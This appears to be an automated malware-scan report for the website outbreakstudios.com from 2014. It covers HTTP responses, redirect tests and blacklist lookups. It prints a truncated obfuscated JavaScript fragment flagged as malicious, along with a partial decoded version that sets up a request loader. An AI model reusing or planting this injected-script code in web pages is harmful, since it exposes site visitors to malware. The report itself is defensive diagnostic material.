Scanned pages/files
Request | Server response | Status |
http://outbreakstudios.com/ | 200 OK Content-Length: 33190 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) d='function g_p(file ,b >t YG="GE ;= [ +cg="" Je +L=tru % +c.offset=100 Qs Yy =z =A =D ! C8 H +C =B ! C8 H Qu Ys ]+t ]Qcd YH(); -sxml2 V1 C-icrosoft V2 ,b=null}}if(! b){if(typeof F!="undefined" ,b 9 F ]* L= 2}} Qo NE, ? ,g[g_E]= .( ?,false) QS NE, ?, <vars C32== <vars C< .( $g_E), $ ?)) * g[ $g_E)]= .( $ ?) U} Qx Nn,g_R){g_N= $ Wf);regexp 9RegExp( Wf+"|"+g_N); B. On 5regexp) Ei=0;i< B. 6;i++){g_k= B.[i] 5"="); 32= OR ,S A * o A}}}; [.trim NE,g_h){if("qabcdef".indexOf(g_E.substr Decoded script: function g_p(file){this.g_b=null;this.g_t=function(){this.g_G="GET";this.g_w="?";this.g_cf="&";this.g_c=window;this.g_cg="";this.g_P=true;this.g_M=false;this.g_L=true;this.g_cc=null;this.g_T=null;this.g_v=file;this.g_g=new Object();this.g_r=new Array(2);this.g_c.offset=100};this.g_s=function(){this.g_y=function(){};this.g_z=function(){};this.g_A=function(){};this.g_D=function(){this.runResponse()};this.g_C=function(){};this.g_B=function(){this.runResponse()}};this.g_u=function(){this.g_ Antivirus reports:
| ||
https://count.carrierzone.com/app/count_server/count.js | 200 OK Content-Length: 36029 Content-Type: text/javascript | clean |
http://outbreakstudios.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: outbreakstudios.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 Jun 2014 17:03:07 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: outbreakstudios.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 Jun 2014 17:03:07 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: outbreakstudios.com
Referer: http://www.google.com/search?q=outbreakstudios.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: outbreakstudios.com
Referer: http://www.google.com/search?q=outbreakstudios.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=outbreakstudios.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://outbreakstudios.com/
Result: outbreakstudios.com is not infected or malware details are not published yet.
Result: outbreakstudios.com is not infected or malware details are not published yet.